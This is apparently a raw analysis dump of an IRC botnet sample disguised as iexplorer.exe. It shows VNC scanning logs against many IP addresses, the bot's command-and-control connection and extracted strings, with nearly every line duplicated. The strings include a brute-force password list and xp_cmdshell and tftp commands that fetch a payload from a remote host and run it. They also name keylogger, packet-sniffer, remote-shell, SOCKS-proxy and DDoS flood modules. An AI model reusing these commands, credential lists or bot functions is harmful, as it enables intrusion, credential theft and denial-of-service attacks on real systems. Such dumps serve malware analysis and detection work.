IP: 174.178.29.227:5900, Scan thread: 1, Sub-thread: 162.
IP: 174.79.76.14:5900, Scan thread: 1, Sub-thread: 163.
IP: 174.79.76.14:5900, Scan thread: 1, Sub-thread: 163.
IP: 174.5.231.8:5900, Scan thread: 1, Sub-thread: 164.
IP: 174.5.231.8:5900, Scan thread: 1, Sub-thread: 164.
IP: 174.43.3.165:5900, Scan thread: 1, Sub-thread: 165.
IP: 174.43.3.165:5900, Scan thread: 1, Sub-thread: 165.
IP: 174.32.9.192:5900, Scan thread: 1, Sub-thread: 166.
IP: 174.32.9.192:5900, Scan thread: 1, Sub-thread: 166.
IP: 174.152.44.125:5900, Scan thread: 1, Sub-thread: 167.
IP: 174.152.44.125:5900, Scan thread: 1, Sub-thread: 167.
IP: 174.126.75.153:5900, Scan thread: 1, Sub-thread: 168.
IP: 174.126.75.153:5900, Scan thread: 1, Sub-thread: 168.
IP: 174.27.213.7:5900, Scan thread: 1, Sub-thread: 169.
IP: 174.27.213.7:5900, Scan thread: 1, Sub-thread: 169.
IP: 174.201.145.20:5900, Scan thread: 1, Sub-thread: 170.
IP: 174.201.145.20:5900, Scan thread: 1, Sub-thread: 170.
IP: 174.172.23.32:5900, Scan thread: 1, Sub-thread: 171.
IP: 174.172.23.32:5900, Scan thread: 1, Sub-thread: 171.
IP: 174.57.3.30:5900, Scan thread: 1, Sub-thread: 172.
IP: 174.57.3.30:5900, Scan thread: 1, Sub-thread: 172.
IP: 174.234.170.240:5900, Scan thread: 1, Sub-thread: 173.
IP: 174.234.170.240:5900, Scan thread: 1, Sub-thread: 173.
IP: 174.114.91.136:5900, Scan thread: 1, Sub-thread: 174.
IP: 174.114.91.136:5900, Scan thread: 1, Sub-thread: 174.
IP: 174.19.210.38:5900, Scan thread: 1, Sub-thread: 175.
IP: 174.19.210.38:5900, Scan thread: 1, Sub-thread: 175.
IP: 174.80.191.235:5900, Scan thread: 1, Sub-thread: 176.
IP: 174.80.191.235:5900, Scan thread: 1, Sub-thread: 176.
IP: 174.80.114.244:5900, Scan thread: 1, Sub-thread: 177.
IP: 174.80.114.244:5900, Scan thread: 1, Sub-thread: 177.
IP: 174.34.197.191:5900, Scan thread: 1, Sub-thread: 178.
IP: 174.34.197.191:5900, Scan thread: 1, Sub-thread: 178.
IP: 174.153.180.14:5900, Scan thread: 1, Sub-thread: 179.
IP: 174.153.180.14:5900, Scan thread: 1, Sub-thread: 179.
IP: 174.37.154.127:5900, Scan thread: 1, Sub-thread: 180.
IP: 174.37.154.127:5900, Scan thread: 1, Sub-thread: 180.
IP: 174.230.62.26:5900, Scan thread: 1, Sub-thread: 181.
IP: 174.230.62.26:5900, Scan thread: 1, Sub-thread: 181.
IP: 174.12.155.154:5900, Scan thread: 1, Sub-thread: 182.
IP: 174.12.155.154:5900, Scan thread: 1, Sub-thread: 182.
IP: 174.48.165.189:5900, Scan thread: 1, Sub-thread: 183.
IP: 174.48.165.189:5900, Scan thread: 1, Sub-thread: 183.
IP: 174.57.21.18:5900, Scan thread: 1, Sub-thread: 184.
IP: 174.57.21.18:5900, Scan thread: 1, Sub-thread: 184.
IP: 174.188.0.195:5900, Scan thread: 1, Sub-thread: 185.
IP: 174.188.0.195:5900, Scan thread: 1, Sub-thread: 185.
IP: 174.185.166.204:5900, Scan thread: 1, Sub-thread: 186.
IP: 174.185.166.204:5900, Scan thread: 1, Sub-thread: 186.
IP: 174.39.203.34:5900, Scan thread: 1, Sub-thread: 187.
IP: 174.39.203.34:5900, Scan thread: 1, Sub-thread: 187.
IP: 174.140.176.118:5900, Scan thread: 1, Sub-thread: 188.
IP: 174.140.176.118:5900, Scan thread: 1, Sub-thread: 188.
IP: 174.3.241.182:5900, Scan thread: 1, Sub-thread: 189.
IP: 174.3.241.182:5900, Scan thread: 1, Sub-thread: 189.
IP: 174.22.185.205:5900, Scan thread: 1, Sub-thread: 190.
IP: 174.22.185.205:5900, Scan thread: 1, Sub-thread: 190.
IP: 174.231.109.194:5900, Scan thread: 1, Sub-thread: 191.
IP: 174.231.109.194:5900, Scan thread: 1, Sub-thread: 191.
IP: 174.25.13.209:5900, Scan thread: 1, Sub-thread: 192.
IP: 174.25.13.209:5900, Scan thread: 1, Sub-thread: 192.
IP: 174.151.35.149:5900, Scan thread: 1, Sub-thread: 193.
IP: 174.151.35.149:5900, Scan thread: 1, Sub-thread: 193.
IP: 174.85.170.219:5900, Scan thread: 1, Sub-thread: 194.
IP: 174.85.170.219:5900, Scan thread: 1, Sub-thread: 194.
IP: 174.178.22.251:5900, Scan thread: 1, Sub-thread: 195.
IP: 174.178.22.251:5900, Scan thread: 1, Sub-thread: 195.
IP: 174.132.137.37:5900, Scan thread: 1, Sub-thread: 196.
IP: 174.132.137.37:5900, Scan thread: 1, Sub-thread: 196.
IP: 174.127.156.6:5900, Scan thread: 1, Sub-thread: 197.
IP: 174.127.156.6:5900, Scan thread: 1, Sub-thread: 197.
IP: 174.168.67.146:5900, Scan thread: 1, Sub-thread: 198.
IP: 174.168.67.146:5900, Scan thread: 1, Sub-thread: 198.
IP: 174.11.174.18:5900, Scan thread: 1, Sub-thread: 199.
IP: 174.11.174.18:5900, Scan thread: 1, Sub-thread: 199.
IP: 174.209.151.151:5900, Scan thread: 1, Sub-thread: 200.
IP: 174.209.151.151:5900, Scan thread: 1, Sub-thread: 200.
[07-30-2014 01:51:04] [FTP]: Server started on Port: 0, File: %System%\iexplorer.exe, Request: iexplorer.exe.
[07-30-2014 01:51:04] [FTP]: Server started on Port: 0, File: %System%\iexplorer.exe, Request: iexplorer.exe.
exe, Re[07-30-2014 01:51:04] .9-.1::.0[.12 120|MoD.0 ].1::.9-. Server started on Port: 69, File: %System%\iexplorer.exe, R
exe, Re[07-30-2014 01:51:04] .9-.1::.0[.12 120|MoD.0 ].1::.9-. Server started on Port: 69, File: %System%\iexplorer.exe, R
[07-30-2014 01:51:04] Joined channel: ##!v!##
[07-30-2014 01:51:04] Joined channel: ##!v!##
[07-30-2014 01:51:03] Connected to frozynv.ODIN2-VALHALL.COM
[07-30-2014 01:51:03] Connected to frozynv.ODIN2-VALHALL.COM
%System%\iexplorer.exe
%System%\iexplorer.exe
iexplorer.exe_1652_rwx_00400000_0007B000:
.text
.text
`.rdata
`.rdata
@.data
@.data
tTSSh,
tTSSh,
YYu.jWX
YYu.jWX
uDPh
uDPh
GWSSh
GWSSh
t1SSSSh
t1SSSSh
u.hpfB
u.hpfB
(msql)
(msql)
Trying: (%s:%d) user: (%s/%s).
Trying: (%s:%d) user: (%s/%s).
IP: %s
IP: %s
EXEC master..xp_cmdshell '%s'
EXEC master..xp_cmdshell '%s'
EXEC master..xp_cmdshell 'del eq&echo open %s %d >> eq&echo user %d %d >> eq &echo get %s >> eq &echo quit >> eq &ftp -n -s:eq &%s&del eq
EXEC master..xp_cmdshell 'del eq&echo open %s %d >> eq&echo user %d %d >> eq &echo get %s >> eq &echo quit >> eq &ftp -n -s:eq &%s&del eq
DRIVER={SQL Server};SERVER=%s,%d;UID=%s;PWD=%s;%s
DRIVER={SQL Server};SERVER=%s,%d;UID=%s;PWD=%s;%s
winpass
winpass
sqlpassoainstall
sqlpassoainstall
databasepassword
databasepassword
databasepass
databasepass
dbpassword
dbpassword
dbpass
dbpass
domainpassword
domainpassword
domainpass
domainpass
loginpass
loginpass
login
login
windows
windows
1234567890
1234567890
123456789
123456789
12345678
12345678
1234567
1234567
pass1234
pass1234
passwd
passwd
password
password
password1
password1
Windows XP (SP0 SP1)
Windows XP (SP0 SP1)
Windows NT4, 2000 (SP0-SP4)
Windows NT4, 2000 (SP0-SP4)
\\%s\pipe\browser
\\%s\pipe\browser
\\%s\ipc$
\\%s\ipc$
sqlpass
sqlpass
%s %s %s User: (%s) Pass: (%s)
%s %s %s User: (%s) Pass: (%s)
(no password)
(no password)
%s\%s\%s
%s\%s\%s
c$\windows\system32
c$\windows\system32
%s\ipc$
%s\ipc$
99999999
99999999
21122112
21122112
00000000
00000000
Password
Password
newpass
newpass
passe
passe
!@#$%^&*
!@#$%^&*
~!@#$%^&
~!@#$%^&
monkey
monkey
7654321
7654321
87654321
87654321
%systemroot%\system32\cmd.exe
%systemroot%\system32\cmd.exe
VNC%d.%d %s: %s - [NoPassword]
VNC%d.%d %s: %s - [NoPassword]
VNC%d.%d %s: %s - %s
VNC%d.%d %s: %s - %s
VNC%d.%d %s: %s - [AuthBypass]
VNC%d.%d %s: %s - [AuthBypass]
RFB d.d
RFB d.d
del eq&echo open %s %d >> eq&echo user %d %d >> eq &echo get %s >> eq &echo quit >> eq &ftp -n -s:eq &%s &del eq
del eq&echo open %s %d >> eq&echo user %d %d >> eq &echo get %s >> eq &echo quit >> eq &ftp -n -s:eq &%s &del eq
port
port
nick
nick
join
join
tftp
tftp
rndnick
rndnick
httpstop
httpstop
opencmd
opencmd
cmdstop
cmdstop
rcmd
rcmd
httpcon
httpcon
keylog
keylog
*@im.batman
*@im.batman
[%.2d-%.2d-M %.2d:%.2d:%.2d] %s
[%.2d-%.2d-M %.2d:%.2d:%.2d] %s
%s Error: %s <%d>.
%s Error: %s <%d>.
explorer.exe
explorer.exe
%s %s
%s %s
%%comspec%% /c %s %s
%%comspec%% /c %s %s
del "%s"
del "%s"
%sdel.bat
%sdel.bat
%s %s :%s
%s %s :%s
PRIVMSG
PRIVMSG
PRIVMSG %s :%s
PRIVMSG %s :%s
%s Failed to start IO thread, error %d
%s Failed to start IO thread, error %d
cmd.exe
cmd.exe
%s: %s (%s)
%s: %s (%s)
The following Windows services are registered:
The following Windows services are registered:
%s User info error: <%ld>
%s User info error: <%ld>
Units Per Week: %d
Units Per Week: %d
Max. Storage: %d
Max. Storage: %d
User's Language: %d
User's Language: %d
Country Code: %d
Country Code: %d
Workstations: %S
Workstations: %S
Logon Server: %S
Logon Server: %S
Last Logoff: %d
Last Logoff: %d
Last Logon: %d
Last Logon: %d
Number of Logins: %d
Number of Logins: %d
Bad Password Count: %d
Bad Password Count: %d
Password Age: %d
Password Age: %d
Parameters: %S
Parameters: %S
Home Directory: %S
Home Directory: %S
Auth Flags: %d
Auth Flags: %d
Privilege Level: %s
Privilege Level: %s
Comment: %S
Comment: %S
User Comment: %S
User Comment: %S
Full Name: %S
Full Name: %S
Account: %S
Account: %S
The password is shorter than required (or does not meet the password policy requirement.)
The password is shorter than required (or does not meet the password policy requirement.)
The operation is allowed only on the primary domain controller of the domain.
The operation is allowed only on the primary domain controller of the domain.
This network request is not supported.
This network request is not supported.
%s %s <Server: %S> <Message: %S></Message:></Server:>
%s %s <Server: %S> <Message: %S></Message:></Server:>
%s Message sent successfully
%s Message sent successfully
%s Not supported by this system
%s Not supported by this system
%s Unable to allocation ARP cache
%s Unable to allocation ARP cache
%s Error getting ARP cache %d
%s Error getting ARP cache %d
%s ARP cache is empty
%s ARP cache is empty
%s Error getting ARP cache %d
%s Error getting ARP cache %d
%d.%d.%d.%d
%d.%d.%d.%d
%s %s HTTP/1.1
%s %s HTTP/1.1
Referer: %s
Referer: %s
Host: %s
Host: %s
%s %s Drive (%s): %s total, %s free, %s available.
%s %s Drive (%s): %s total, %s free, %s available.
%s %s Drive (%s): Failed to stat, device not ready.
%s %s Drive (%s): Failed to stat, device not ready.
%s (%d)
%s (%d)
%s Process list failed
%s Process list failed
%s Process list completed
%s Process list completed
%s Listing processes:
%s Listing processes:
%s Netapi32.dll couldn't be loaded
%s Netapi32.dll couldn't be loaded
%s Network shares deleted
%s Network shares deleted
%s Failed to delete '%S' share.
%s Failed to delete '%S' share.
%s Share '%S' deleted.
%s Share '%S' deleted.
%s Failed to delete '%s' share.
%s Failed to delete '%s' share.
%s Share '%s' deleted.
%s Share '%s' deleted.
%s Advapi32.dll couldn't be loaded
%s Advapi32.dll couldn't be loaded
%s Failed to open IPC$ Restriction registry key
%s Failed to open IPC$ Restriction registry key
%s Restricted access to the IPC$ Share
%s Restricted access to the IPC$ Share
%s Failed to restrict access to the IPC$ Share
%s Failed to restrict access to the IPC$ Share
%s Failed to open DCOM registry key
%s Failed to open DCOM registry key
%s DCOM disabled
%s DCOM disabled
%s Disable DCOM failed
%s Disable DCOM failed
%s Network shares added
%s Network shares added
%s Failed to add '%s' share.
%s Failed to add '%s' share.
%s Share '%s' added.
%s Share '%s' added.
%s Failed to open IPC$ restriction registry key
%s Failed to open IPC$ restriction registry key
%s Unrestricted access to the IPC$ Share
%s Unrestricted access to the IPC$ Share
%s Failed to unrestrict access to the IPC$ Share
%s Failed to unrestrict access to the IPC$ Share
%s DCOM enabled
%s DCOM enabled
%s Enable DCOM failed
%s Enable DCOM failed
%s Transfer Complete On %s Executing ::(
%s Transfer Complete On %s Executing ::(
%s Error: socket() failed, returned: %d
%s Error: socket() failed, returned: %d
%s Failed to send to Remote command shell
%s Failed to send to Remote command shell
%s Failed to open remote command shell
%s Failed to open remote command shell
%s Failed to open socket
%s Failed to open socket
%s Transfer complete to IP: %s Filename: %s (%s bytes)
%s Transfer complete to IP: %s Filename: %s (%s bytes)
%s Unable to open socket
%s Unable to open socket
.DCC SEND %s %i %i %i.
.DCC SEND %s %i %i %i.
%s File doesn't exist
%s File doesn't exist
%s Failed to bind to socket
%s Failed to bind to socket
%s Failed to create socket
%s Failed to create socket
%s Transfer complete from IP: %s Filename: %s (%s bytes)
%s Transfer complete from IP: %s Filename: %s (%s bytes)
%s Socket error
%s Socket error
%s Error opening socket
%s Error opening socket
%s Error opening file for writing
%s Error opening file for writing
%s Error unable to write file to disk
%s Error unable to write file to disk
%d. %s = %s
%d. %s = %s
%s IP: %s Port: %d is open
%s IP: %s Port: %d is open
IP: %s Port: %d
IP: %s Port: %d
%s Bad URL, or DNS Error: %s
%s Bad URL, or DNS Error: %s
%s Update failed: Error executing file: %s
%s Update failed: Error executing file: %s
%s Downloaded %.1fKB to %s @ %.1fKB/sec. Updating
%s Downloaded %.1fKB to %s @ %.1fKB/sec. Updating
%s Opened: %s
%s Opened: %s
%s Downloaded %.1f KB to %s @ %.1f KB/sec.
%s Downloaded %.1f KB to %s @ %.1f KB/sec.
A%s CRC Failed (%d != %d)
A%s CRC Failed (%d != %d)
%s Filesize is incorrect: (%d != %d).
%s Filesize is incorrect: (%d != %d).
%s Update: %s (%dKB transferred)
%s Update: %s (%dKB transferred)
%s File download: %s (%dKB transferred)
%s File download: %s (%dKB transferred)
%s Couldn't open file: %s
%s Couldn't open file: %s
%s %s: No service specified
%s %s: No service specified
%s Error with service: '%s'. %s
%s Error with service: '%s'. %s
%s %s service: '%s'.
%s %s service: '%s'.
%s %s: No share specified
%s %s: No share specified
%s %s share: '%s'.
%s %s share: '%s'.
%s %s: Error with share: '%s'. %s
%s %s: Error with share: '%s'. %s
%s Share list error: %s <%ld>
%s Share list error: %s <%ld>
%s %s: No username specified
%s %s: No username specified
%s %s: Error with username: '%s'. %s
%s %s: Error with username: '%s'. %s
%s %s username: '%s'
%s %s username: '%s'
Total users found: %d.
Total users found: %d.
%s An access violation has occured
%s An access violation has occured
%s User list error: %s <%ld>
%s User list error: %s <%ld>
PRIVMSG %s :Found %s Files and %s Directories
PRIVMSG %s :Found %s Files and %s Directories
<TD WIDTH="%d"><CODE>%s</CODE></TD>
<TD WIDTH="%d"><CODE>%s</CODE></TD>
<TD WIDTH="%d" ALIGN="right"><CODE>%dk</CODE></TD>
<TD WIDTH="%d" ALIGN="right"><CODE>%dk</CODE></TD>
"><CODE>%s</CODE>
"><CODE>%s</CODE>
PRIVMSG %s :%-31s %-21s (%s bytes)
PRIVMSG %s :%-31s %-21s (%s bytes)
<TD WIDTH="%d" ALIGN="right"><CODE>-</CODE></TD>
<TD WIDTH="%d" ALIGN="right"><CODE>-</CODE></TD>
"><CODE>%s/</CODE>
"><CODE>%s/</CODE>
%s%s/
%s%s/
<TD WIDTH="%d"><A HREF="</pre><pre>PRIVMSG %s :%-31s %-21s</pre><pre>%2.2d/%2.2d/M %2.2d:%2.2d %s</pre><pre><TD COLSPAN=" 3="3"><CODE>Parent Directory</CODE></A></TD>
<TD WIDTH="%d"><A HREF="</pre><pre>PRIVMSG %s :%-31s %-21s</pre><pre>%2.2d/%2.2d/M %2.2d:%2.2d %s</pre><pre><TD COLSPAN=" 3="3"><CODE>Parent Directory</CODE></A></TD>
Searching for: %s
Searching for: %s
<TD WIDTH="%d"><CODE>Name</CODE></TD>
<TD WIDTH="%d"><CODE>Name</CODE></TD>
<TD WIDTH="%d"><CODE>Last Modified</CODE></TD>
<TD WIDTH="%d"><CODE>Last Modified</CODE></TD>
<TD WIDTH="%d" ALIGN="right"><CODE>Size</CODE></TD>
<TD WIDTH="%d" ALIGN="right"><CODE>Size</CODE></TD>
<H1>Index of %s</H1>
<H1>Index of %s</H1>
<TITLE>Index of %s</TITLE>
<TITLE>Index of %s</TITLE>
PRIVMSG %s :Searching for: %s
PRIVMSG %s :Searching for: %s
%s List complete.
%s List complete.
HTTP/1.0 200 OK
HTTP/1.0 200 OK
Content-Type: %s
Content-Type: %s
Date: %s %s GMT
Date: %s %s GMT
Last-Modified: %s %s GMT
Last-Modified: %s %s GMT
Expires: %s %s GMT
Expires: %s %s GMT
%s Failed to start worker thread, error %d
%s Failed to start worker thread, error %d
%s Worker thread of server thread: %d
%s Worker thread of server thread: %d
%s Error: server failed, returned %d
%s Error: server failed, returned %d
MODE %s %s
MODE %s %s
USERHOST %s
USERHOST %s
[SOCKS4]: Failed to start server thread, error: <%d>.
[SOCKS4]: Failed to start server thread, error: <%d>.
[SOCKS4]: Server started on: %s:%d.
[SOCKS4]: Server started on: %s:%d.
%s Failed to start secure thread, error %d
%s Failed to start secure thread, error %d
%s %s System
%s %s System
[DDoS]: Failed to start flood thread, error: <%d>.
[DDoS]: Failed to start flood thread, error: <%d>.
[DDoS]: Flooding: (%s:%s) for %s seconds.
[DDoS]: Flooding: (%s:%s) for %s seconds.
[SYN]: Failed to start flood thread, error: <%d>.
[SYN]: Failed to start flood thread, error: <%d>.
[SYN]: Flooding: (%s:%s) for %s seconds.
[SYN]: Flooding: (%s:%s) for %s seconds.
[ICMP]: Failed to start flood thread, error: <%d>.
[ICMP]: Failed to start flood thread, error: <%d>.
[ICMP]: Flooding: (%s) for %s seconds.
[ICMP]: Flooding: (%s) for %s seconds.
[UDP]: Failed to start flood thread, error: <%d>.
[UDP]: Failed to start flood thread, error: <%d>.
[UDP]: Sending %d packets to: %s. Packet size: %d, Delay: %d(ms).
[UDP]: Sending %d packets to: %s. Packet size: %d, Delay: %d(ms).
ICMP.dll not available
ICMP.dll not available
[PING]: Failed to start flood thread, error: <%d>.
[PING]: Failed to start flood thread, error: <%d>.
[PING]: Sending %d pings to %s. packet size: %d, timeout: %d(ms).
[PING]: Sending %d pings to %s. packet size: %d, timeout: %d(ms).
[TCP]: Invalid flood time must be greater than 0.
[TCP]: Invalid flood time must be greater than 0.
[TCP]: Failed to start flood thread, error: <%d>.
[TCP]: Failed to start flood thread, error: <%d>.
[TCP]: %s %s flooding: (%s:%s) for %s seconds.
[TCP]: %s %s flooding: (%s:%s) for %s seconds.
[TCP]: Invalid flood type specified.
[TCP]: Invalid flood type specified.
%s Uploading file: %s to: %s failed
%s Uploading file: %s to: %s failed
%s Uploading file: %s to: %s
%s Uploading file: %s to: %s
ftp.exe
ftp.exe
-s:%s
-s:%s
open %s
open %s
put %s
put %s
%s\%i%i%i.dll
%s\%i%i%i.dll
%s File not found: %s
%s File not found: %s
tcpflood
tcpflood
udpflood
udpflood
%s failed to start, no range specified
%s failed to start, no range specified
%s failed to start, syntax is invalid
%s failed to start, syntax is invalid
%s already %d threads. too many specified
%s already %d threads. too many specified
%s Failed to start, no range specified
%s Failed to start, no range specified
%s Failed to start, syntax is invalid
%s Failed to start, syntax is invalid
%s Failed to start thread, error: %d
%s Failed to start thread, error: %d
%s %s Method started at %s :%s for %d minutes %d delay %d threads
%s %s Method started at %s :%s for %d minutes %d delay %d threads
%s Already %d threads. Too many specified.
%s Already %d threads. Too many specified.
%s Failed to start, thread, error %d
%s Failed to start, thread, error %d
%s Started: %s:%d with delay: %d(ms)
%s Started: %s:%d with delay: %d(ms)
%s Downloading URL: %s to: %s
%s Downloading URL: %s to: %s
%s Rename: '%s' to: '%s'
%s Rename: '%s' to: '%s'
%s Couldn't execute file
%s Couldn't execute file
%s ID must be different than current running process
%s ID must be different than current running process
%s Failed to start download thread, error %d
%s Failed to start download thread, error %d
%s Downloading update from: %s
%s Downloading update from: %s
%s%s.exe
%s%s.exe
ddos.random
ddos.random
ddos.ack
ddos.ack
ddos.syn
ddos.syn
%s Repeat not allowed in command line: %s
%s Repeat not allowed in command line: %s
%s Repeat: %s
%s Repeat: %s
Mode change: %s
Mode change: %s
MODE %s
MODE %s
Action: %s: %.
Action: %s: %.
ACTION %s
ACTION %s
Privmsg: %s: %s
Privmsg: %s: %s
%s Alias added: %s
%s Alias added: %s
%s Gethost: %s
%s Gethost: %s
%s Unable to extract Gethost command
%s Unable to extract Gethost command
%s Gethost: %s , Command: %s
%s Gethost: %s , Command: %s
%s %s %s :%s
%s %s %s :%s
%s Command unknown
%s Command unknown
%s No message specified
%s No message specified
%s User list failed
%s User list failed
%s User list completed
%s User list completed
%s Share list failed
%s Share list failed
%s Share list completed
%s Share list completed
%s Service list failed
%s Service list failed
%s Service list complete.
%s Service list complete.
%s Failed to load advapi32.dll or netapi32.dll
%s Failed to load advapi32.dll or netapi32.dll
[KEYLOG]: Failed to start logging thread, error: <%d>.
[KEYLOG]: Failed to start logging thread, error: <%d>.
[KEYLOG]: Key logger active.
[KEYLOG]: Key logger active.
[KEYLOG]: Already running.
[KEYLOG]: Already running.
[KEYLOG]: No key logger thread found.
[KEYLOG]: No key logger thread found.
[KEYLOG]: Key logger stopped. (%d thread(s) stopped.)
[KEYLOG]: Key logger stopped. (%d thread(s) stopped.)
[PSNIFF]: Carnivore stopped. (%d thread(s) stopped.)
[PSNIFF]: Carnivore stopped. (%d thread(s) stopped.)
[PSNIFF]: Failed to start sniffer thread, error: <%d>.
[PSNIFF]: Failed to start sniffer thread, error: <%d>.
%s Read file failed: %s
%s Read file failed: %s
%s Read file complete: %s
%s Read file complete: %s
%s Commands: %s
%s Commands: %s
%s Error sending to remote shell
%s Error sending to remote shell
%s Command sent
%s Command sent
%s Client not open
%s Client not open
List: %s
List: %s
%s Send File: %s, User: %s
%s Send File: %s, User: %s
%s Deleted '%s'
%s Deleted '%s'
%s Failed to terminate process ID: %s
%s Failed to terminate process ID: %s
%s Process killed ID: %s
%s Process killed ID: %s
%s Failed to terminate process: %s
%s Failed to terminate process: %s
%s Process killed: %s
%s Process killed: %s
%s Couldn't resolve hostname
%s Couldn't resolve hostname
%s Lookup: %s -> %s
%s Lookup: %s -> %s
%s Server changed to: '%s'
%s Server changed to: '%s'
%s File opened: %s
%s File opened: %s
%s Prefix changed to: '%c'
%s Prefix changed to: '%c'
%s Failed to kill thread: %s
%s Failed to kill thread: %s
%s Killed thread: %s
%s Killed thread: %s
%s No active threads found
%s No active threads found
%s Stopped: %d thread(s)
%s Stopped: %d thread(s)
IRC Raw: %s
IRC Raw: %s
Parted channel: '%s'.
Parted channel: '%s'.
PART %s
PART %s
Joined channel: '%s'.
Joined channel: '%s'.
Nick changed to: '%s'.
Nick changed to: '%s'.
%s Currently %d Threads
%s Currently %d Threads
%s Crashing bot
%s Crashing bot
%s TfTp Server started on Port: %d, File: %s, Request: %s
%s TfTp Server started on Port: %d, File: %s, Request: %s
%s Already running
%s Already running
%s Failed to start server thread, error %d
%s Failed to start server thread, error %d
%s Server listening on IP: %s:%d, Directory: %s\.
%s Server listening on IP: %s:%d, Directory: %s\.
%s Failed to load dnsapi.dll
%s Failed to load dnsapi.dll
%s Failed to flush DNS cache
%s Failed to flush DNS cache
%s DNS cache flushed
%s DNS cache flushed
%s Failed to flush ARP cache
%s Failed to flush ARP cache
%s ARP cache flushed
%s ARP cache flushed
Login list complete
Login list complete
%d. %s
%d. %s
%s Remote shell ready
%s Remote shell ready
%s Couldn't open remote shell
%s Couldn't open remote shell
%s Remote shell already running
%s Remote shell already running
%s Uptime: %s
%s Uptime: %s
%s Failed to start listing thread, error %d
%s Failed to start listing thread, error %d
%s Proccess list
%s Proccess list
%s Failed to start listing thread, error %d
%s Failed to start listing thread, error %d
%s Failed to start list thread, error %d
%s Failed to start list thread, error %d
%s Bot ID: %s
%s Bot ID: %s
%s Status: Ready. Bot Uptime: %s
%s Status: Ready. Bot Uptime: %s
QUIT :%s
QUIT :%s
[TFTP]
[TFTP]
tftpstop
tftpstop
UDP flood
UDP flood
udpstop
udpstop
ddos.stop
ddos.stop
%s Invalid login slot number: %d
%s Invalid login slot number: %d
%s No user logged in at slot: %d
%s No user logged in at slot: %d
%s User %s logged out.
%s User %s logged out.
%s Random nick change: %s
%s Random nick change: %s
$rndnick
$rndnick
User: %s logged in
User: %s logged in
%s *Failed host auth by: (%s!%s)
%s *Failed host auth by: (%s!%s)
NOTICE %s :Host Auth failed (%s!%s).
NOTICE %s :Host Auth failed (%s!%s).
%s *Failed pass auth by: (%s!%s)
%s *Failed pass auth by: (%s!%s)
NOTICE %s :Your attempt has been logged.
NOTICE %s :Your attempt has been logged.
NOTICE %s :Pass auth failed (%s!%s).
NOTICE %s :Pass auth failed (%s!%s).
NOTICE %s : Password(arg) = '%s'
NOTICE %s : Password(arg) = '%s'
NOTICE %s : Password(enc) = '%s'
NOTICE %s : Password(enc) = '%s'
NOTICE %s : Password = '%s'
NOTICE %s : Password = '%s'
NOTICE %s : Password(before) = '%s'
NOTICE %s : Password(before) = '%s'
NOTICE %s : Authost = '%s'
NOTICE %s : Authost = '%s'
NOTICE %s : Nickconst = '%s'
NOTICE %s : Nickconst = '%s'
NOTICE %s : Channel = '%s'
NOTICE %s : Channel = '%s'
NOTICE %s : Server = '%s'
NOTICE %s : Server = '%s'
NOTICE %s : Version = '%s'
NOTICE %s : Version = '%s'
NOTICE %s : Id = '%s'
NOTICE %s : Id = '%s'
%s Chat failed by unauthorized user: %s
%s Chat failed by unauthorized user: %s
%s Chat already active with user: %s
%s Chat already active with user: %s
%s Failed to start chat thread, error %d
%s Failed to start chat thread, error %d
%s Chat from user: %s
%s Chat from user: %s
%s Receive file: '%s' failed from unauthorized user: %s.
%s Receive file: '%s' failed from unauthorized user: %s.
NOTICE %s :
NOTICE %s :
PING %s
PING %s
VERSION %s
VERSION %s
%s Failed to start transfer thread, error %d
%s Failed to start transfer thread, error %d
%s Receive file: '%s' from user: %s.
%s Receive file: '%s' from user: %s.
%s User: %s logged out
%s User: %s logged out
Joined channel: %s
Joined channel: %s
:%s%s
:%s%s
NICK
NICK
NOTICE %s :%s
NOTICE %s :%s
%s User %s logged out
%s User %s logged out
NICK %s
NICK %s
JOIN %s %s
JOIN %s %s
PONG %s
PONG %s
USER %s 0 0 :%s
USER %s 0 0 :%s
PASS %s
PASS %s
Connected to %s
Connected to %s
%s Bot started
%s Bot started
%s %d "%s"
%s %d "%s"
%s\%s
%s\%s
Total: %d in %s
Total: %d in %s
[%s]: %d,
[%s]: %d,
tftp -i %s get %s &%s
tftp -i %s get %s &%s
%s Scan not active.
%s Scan not active.
%s Current IP: %s
%s Current IP: %s
[FTP]: Failed to start server, error: <%d>.
[FTP]: Failed to start server, error: <%d>.
[FTP]: Server started on Port: %d, File: %s, Request: %s.
[FTP]: Server started on Port: %d, File: %s, Request: %s.
%s Failed to start server, error: <%d>.
%s Failed to start server, error: <%d>.
%s Server started on Port: %d, File: %s, Request: %s.
%s Server started on Port: %d, File: %s, Request: %s.
IP: %s, Port %d is open.
IP: %s, Port %d is open.
IP: %s:%d, Scan thread: %d, Sub-thread: %d.
IP: %s:%d, Scan thread: %d, Sub-thread: %d.
%s Finished at %s:%d after %d minute(s) of scanning.
%s Finished at %s:%d after %d minute(s) of scanning.
Failed to start worker thread, error: <%d>.
Failed to start worker thread, error: <%d>.
%s:%d, Scan thread: %d, Sub-thread: %d.
%s:%d, Scan thread: %d, Sub-thread: %d.
-[DDoS]: Send error: <%d>.
-[DDoS]: Send error: <%d>.
IP: %s (%s).
IP: %s (%s).
200 PORT command successful.
200 PORT command successful.
%s.%s.%s.%s
%s.%s.%s.%s
PORT
PORT
425 Passive not supported on this server
425 Passive not supported on this server
215 StnyFtpd
215 StnyFtpd
331 Password required
331 Password required
220 StnyFtpd 0wns j0
220 StnyFtpd 0wns j0
[ICMP]: Error sending packets to IP: %s. Packets sent: %d. Returned: <%d>.
[ICMP]: Error sending packets to IP: %s. Packets sent: %d. Returned: <%d>.
[ICMP]: Done with %s flood to IP: %s. Sent: %d packet(s) @ %dKB/sec (%dMB).
[ICMP]: Done with %s flood to IP: %s. Sent: %d packet(s) @ %dKB/sec (%dMB).
[ICMP]: Error: setsockopt() failed, returned: <%d>.
[ICMP]: Error: setsockopt() failed, returned: <%d>.
[ICMP]: Error: socket() failed, returned: <%d>.
[ICMP]: Error: socket() failed, returned: <%d>.
[KEYLOG]: %s
[KEYLOG]: %s
[%d-%d-%d %d:%d:%d] %s
[%d-%d-%d %d:%d:%d] %s
%s (Return) (%s)
%s (Return) (%s)
%s (Buffer full) (%s)
%s (Buffer full) (%s)
%s (Changed Windows: %s)
%s (Changed Windows: %s)
SQLDisconnect
SQLDisconnect
SQLFreeHandle
SQLFreeHandle
SQLAllocHandle
SQLAllocHandle
SQLExecDirect
SQLExecDirect
SQLSetEnvAttr
SQLSetEnvAttr
SQLDriverConnect
SQLDriverConnect
odbc32.dll
odbc32.dll
ShellExecuteA
ShellExecuteA
shell32.dll
shell32.dll
mpr.dll
mpr.dll
iphlpapi.dll
iphlpapi.dll
dnsapi.dll
dnsapi.dll
netapi32.dll
netapi32.dll
icmp.dll
icmp.dll
